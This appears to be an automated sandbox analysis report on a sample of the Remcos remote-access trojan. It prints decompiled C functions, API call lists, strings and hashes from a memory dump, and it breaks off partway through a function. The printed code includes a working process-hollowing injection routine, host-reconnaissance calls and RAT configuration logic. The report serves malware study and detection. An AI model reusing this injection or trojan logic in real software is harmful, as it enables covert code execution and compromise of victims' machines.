libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CD09() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bb04 = _t24;
				return _t24;
			}

0x0040cd1c
0x0040cd25
0x0040cd2d
0x0040cd34
0x0040cd45
0x0040cd45
0x0040cd60
0x0040cd65
0x0040cd76
0x0040cd76
0x0040cd94
0x0040cda8
0x0040cdbc
0x0040cdd0
0x0040cde4
0x0040cdf8
0x0040ce0c
0x0040ce20
0x0040ce31
0x0040ce39
0x0040ce3d
0x0040ce43

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
GetProcAddress.KERNEL32(00000000), ref: 0040CD25
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
GetProcAddress.KERNEL32(00000000), ref: 0040CD43
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
GetProcAddress.KERNEL32(00000000), ref: 0040CD57
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
GetProcAddress.KERNEL32(00000000), ref: 0040CD74
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
GetProcAddress.KERNEL32(00000000), ref: 0040CD88
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
GetProcAddress.KERNEL32(00000000), ref: 0040CE00
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
GetProcAddress.KERNEL32(00000000), ref: 0040CE14
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
GetProcAddress.KERNEL32(00000000), ref: 0040CE28
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
GetProcAddress.KERNEL32(00000000), ref: 0040CE39

Strings

IsWow64Process, xrefs: 0040CD9E
Psapi.dll, xrefs: 0040CD17, 0040CD4F
GetMonitorInfoW, xrefs: 0040CE16
Kernel32.dll, xrefs: 0040CD3B, 0040CD6C
Sept-AITAB5, xrefs: 0040CD10
Shell32, xrefs: 0040CDCB
NtUnmapViewOfSection, xrefs: 0040CD7B
Shlwapi.dll, xrefs: 0040CE2C
EnumDisplayDevicesW, xrefs: 0040CDEE
SetProcessDEPPolicy, xrefs: 0040CDDA
GetModuleFileNameExA, xrefs: 0040CD12, 0040CD36
ntdll.dll, xrefs: 0040CD80
user32, xrefs: 0040CDF3, 0040CE07, 0040CE1B
kernel32, xrefs: 0040CDA3, 0040CDB7, 0040CDDF
GetComputerNameExW, xrefs: 0040CDB2
EnumDisplayMonitors, xrefs: 0040CE02
GetModuleFileNameExW, xrefs: 0040CD4A, 0040CD67
IsUserAnAdmin, xrefs: 0040CDC6
kernel32.dll, xrefs: 0040CD8F
GlobalMemoryStatusEx, xrefs: 0040CD8A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Sept-AITAB5$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-280768746
Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF

Uniqueness

Uniqueness Score: -1.00%

Function 0041412B, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041412B(WCHAR* __ecx, char __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				char _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				int _t57;
				void* _t58;
				CONTEXT* _t62;
				int _t63;
				int _t71;
				void* _t72;
				void* _t73;
				int _t74;
				int _t79;
				long _t80;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						L00431F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t57 = CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116); // executed
						if(_t57 == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						FindCloseChangeNotification(_v92.hStdInput); // executed
						FindCloseChangeNotification(_v92.hStdOutput); // executed
						CloseHandle(_v92.hStdError);
						_t62 = VirtualAlloc(0, 4, 0x1000, 4); // executed
						_t110 = _t62;
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t63 = GetThreadContext(_t116->hThread, _t110); // executed
						if(_t63 == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							CloseHandle(_t116->hThread);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						}
						_t71 = ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0); // executed
						if(_t71 == 0) {
							goto L20;
						}
						_t72 = _v8;
						if(_t72 ==  *(_t95 + 0x34)) {
							NtUnmapViewOfSection(_t116->hProcess, _t72);
						}
						_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40); // executed
						_v24 = _t73;
						if(_t73 == 0) {
							goto L20;
						} else {
							_t22 =  &_v16; // 0x41433b
							_t113 =  *_t22;
							_t74 = WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0); // executed
							if(_t74 == 0) {
								goto L20;
							}
							_v12 = _v12 & 0x00000000;
							if(0 >=  *(_t95 + 6)) {
								L14:
								_t98 = _t95 + 0x34;
								_t114 = _v20;
								if(_v8 ==  *_t98) {
									L17:
									_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
									_t79 = SetThreadContext(_t116->hThread, _t114); // executed
									if(_t79 == 0) {
										goto L20;
									}
									_t80 = ResumeThread(_t116->hThread); // executed
									if(_t80 == 0xffffffff) {
										goto L20;
									}
									_t58 = 1;
									goto L22;
								}
								_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0); // executed
								if(_t83 != 0) {
									goto L17;
								}
								TerminateProcess(_t116->hProcess, _t83);
								goto L21;
							}
							_t104 = 0;
							_v16 = 0;
							do {
								WriteProcessMemory( *_t116,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x10c)) + _t113,  *( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x108), 0); // executed
								_t37 =  &_v16; // 0x41433b
								_t102 = _v12 + 1;
								_t104 =  *_t37 + 0x28;
								_v12 = _t102;
								_v16 = _t104;
							} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
							goto L14;
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x00414131
0x0041413a
0x0041413d
0x00414143
0x00414150
0x00414158
0x00414162
0x0041416b
0x00414170
0x0041417a
0x0041417c
0x0041417d
0x0041417e
0x00414190
0x00414198
0x00414322
0x00414322
0x00414324
0x00414326
0x00000000
0x00414326
0x004141a7
0x004141ac
0x004141b1
0x004141be
0x004141c4
0x004141c7
0x004141ca
0x004141d3
0x004141db
0x00414301
0x00414305
0x00414313
0x00414318
0x0041431e
0x0041431f
0x00414320
0x00414321
0x00000000
0x00414321
0x004141f5
0x004141fd
0x00000000
0x00000000
0x00414203
0x00414209
0x0041420e
0x0041420e
0x00414223
0x00414229
0x0041422e
0x00000000
0x00414234
0x00414234
0x00414234
0x00414240
0x00414248
0x00000000
0x00000000
0x0041424e
0x00414258
0x004142a2
0x004142a5
0x004142a8
0x004142ad
0x004142d5
0x004142dc
0x004142e5
0x004142ed
0x00000000
0x00000000
0x004142f2
0x004142fb
0x00000000
0x00000000
0x004142fd
0x00000000
0x004142fd
0x004142c0
0x004142c8
0x00000000
0x00000000
0x004142cd
0x00000000
0x004142cd
0x0041425a
0x0041425c
0x0041425f
0x00414284
0x0041428d
0x00414290
0x00414295
0x00414298
0x0041429b
0x0041429e
0x00000000
0x0041425f
0x0041422e
0x0041415a
0x00000000
0x0041415a
0x00000000

Strings

;CA, xrefs: 00414234, 0041428D, 0041423C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ;CA
API String ID: 0-233881251
Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00404E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00404E9A(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46bb03;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_t50 = "%02i:%02i:%02i:%03i [Info] ";
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0040482E(__eflags, L00401F95(E00405343(_t50,  &_v44, E00402084("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
						E00401FC7();
						E00401FC7();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0040482E(__eflags, L00401F95(E00405343(_t50,  &_v68, E00402084(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
						E00401FC7();
						E00401FC7();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E0040518A, _t68, 0, 0); // executed
				return 1;
			}

0x00404ea2
0x00404ea9
0x00404fa2
0x00000000
0x00404fa2
0x00404eb3
0x00404eb6
0x00404ec1
0x00404ec8
0x00404ed2
0x00404edf
0x00404ee4
0x00404ee9
0x00404eee
0x00404f12
0x00404f1d
0x00404f25
0x00404f31
0x00404f32
0x00404f37
0x00404f3c
0x00404f60
0x00404f6b
0x00404f73
0x00404f73
0x00404eb8
0x00404eb8
0x00404eb8
0x00404f78
0x00404f81
0x00404f95
0x00404f98
0x00000000

APIs

GetLocalTime.KERNEL32(00000001,0046C238,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,004125B1), ref: 00404ED2
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C780,00000000), ref: 00404F85
CreateThread.KERNELBASE(00000000,00000000,0040518A,?,00000000,00000000), ref: 00404F98

Strings

%02i:%02i:%02i:%03i [Info] , xrefs: 00404EE4, 00404EF9, 00404F47
Connection KeepAlive enabled, xrefs: 00404EF4
Connection KeepAlive timeout: %i, xrefs: 00404F42

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Create$EventLocalThreadTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
API String ID: 2532271599-119634454
Opcode ID: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
Instruction ID: 5fa9d90cb8be4f3930b06c8b0122489401ffe22f77aad5cdb7e0e5ab13402fbc
Opcode Fuzzy Hash: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
Instruction Fuzzy Hash: 833194A1800255BACB10FBA6CC09DBFBBBCAF95709F04046FF941A21D2EA7C9945D764

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040D0B5() {
				signed int _v32;
				void* _t13;
				void* _t22;
				signed int _t61;
				void* _t63;
				void* _t64;
				void* _t66;

				_t63 = (_t61 & 0xfffffff8) - 0x20;
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = L00401F95(0x46c518); // executed
					E00410885(_t10, "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t67 = _t63 - 0x18;
						E00407350(0x46c500, _t63 - 0x18, _t52, __eflags, 0x46c500);
						_push(L"pth_unenc");
						E00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
						L00401EF0();
						_push(1);
						E00402084(0x46c500, _t67 + 0x20 - 0x18, "3.2.1 Pro");
						_push("v");
						E00410AA7(0x46c518, L00401F95(0x46c518));
						E0041015B();
						ExitProcess(0);
					}
					_t74 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040AD84();
					L5:
					_push(1);
					_t64 = _t63 - 0x18;
					E00407350(0x46c500, _t64, _t52, _t74, 0x46c500);
					_push(L"pth_unenc");
					E00410B4C(0x80000001, L00401EEB(E004172DA( &_v32, 0x46c518)));
					L00401EF0();
					_push(1);
					_t66 = _t64 + 0x20 - 0x18;
					E00402084(0x46c500, _t66, "3.2.1 Pro");
					_push("v");
					E00410AA7(0x46c518, L00401F95(0x46c518));
					_t63 = _t66 + 0x20;
					goto L6;
				}
			}

0x0040d0bb
0x0040d0ca
0x0040d0ca
0x0040d0e0
0x0040d0e2
0x0040d0ed
0x0040d0f0
0x00000000
0x00000000
0x0040d0f2
0x0040d0f5
0x0040d174
0x0040d176
0x0040d17c
0x0040d181
0x0040d19f
0x0040d1ab
0x0040d1b0
0x0040d1bc
0x0040d1c1
0x0040d1cf
0x0040d1d7
0x0040d1de
0x0040d1de
0x0040d0f7
0x0040d0fa
0x0040d164
0x0040d169
0x00000000
0x0040d169
0x0040d0fc
0x0040d101
0x0040d101
0x0040d103
0x0040d109
0x0040d10e
0x0040d12c
0x0040d138
0x0040d13d
0x0040d13f
0x0040d149
0x0040d14e
0x0040d15c
0x0040d161
0x00000000
0x0040d161

APIs

Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE

Sleep.KERNELBASE(00000BB8), ref: 0040D169
ExitProcess.KERNEL32 ref: 0040D1DE

Strings

3.2.1 Pro, xrefs: 0040D144, 0040D1B7
pth_unenc, xrefs: 0040D10E, 0040D181
override, xrefs: 0040D0D4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.2.1 Pro$override$pth_unenc
API String ID: 2281282204-2083519672
Opcode ID: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
Opcode Fuzzy Hash: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5CA, Relevance: 4.5, APIs: 3, Instructions: 33
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0042E5CA(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
				int _t2;
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
				if(_t2 != 0) {
					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}

0x0042e5d8
0x0042e5da
0x0042e5df
0x0042e5e7
0x0042e5fc
0x0042e606
0x00000000
0x0042e60c
0x0042e5fe
0x0042e5eb
0x0042e5eb
0x00000000
0x0042e5eb
0x0042e5e9
0x00000000

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9E, Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00416D9E(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x46beb0(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E004030A6(_t26, _t38, E00404405(_t26,  &_v36,  &_v92, _t39, E0040427F(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				L00401EF0();
				L00401EF0();
				return _t38;
			}

0x00416d9e
0x00416dab
0x00416db6
0x00416dbb
0x00416dc4
0x00416dd3
0x00416dfe
0x00416e07
0x00416e0f
0x00416e1a

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98

Uniqueness

Uniqueness Score: -1.00%

Function 00422251, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0042225C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8B9, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F8B9() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0042F8C5); // executed
				return _t1;
			}

0x0042f8be
0x0042f8c4

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t87;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t160;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x46bd28 = _a4;
				_push(_t268);
				L0040CC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
				_t496 = _t495 - 0x18;
				E004020EC(_t268, _t496, __edx, __eflags,  &_v728); // executed
				_t71 = E00417478( &_v756, __edx);
				_t497 = _t496 + 0x30;
				E0040D458(__edx, _t71);
				L00401E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x46c578;
					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
					 *0x46bb01 = __eflags != 0;
					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t471 = 0x46c518;
					E00401FD1(0x46c518, _t77, 0x46c518, _t78);
					E00401FC7();
					E00401FC7();
					E00405A0B(_t268, 0x46c5cc, "Exe");
					_t269 = 0;
					L00401E49(0x46c578, _t77, __eflags, 0x32);
					__eflags =  *(E00405220(0));
					 *0x46bd4e = __eflags != 0;
					L00401E49(0x46c578, _t77, __eflags, 0x33);
					_t86 = E00405220(0);
					__eflags =  *_t86;
					 *0x46bd4f =  *_t86 != 0;
					__eflags =  *0x46bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t87 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj"); // executed
						_t472 = _t87;
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = L00401F95(0x46c518); // executed
						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = L00401F95(0x46c518);
							L00410CE2(_t259, __eflags, "Inj");
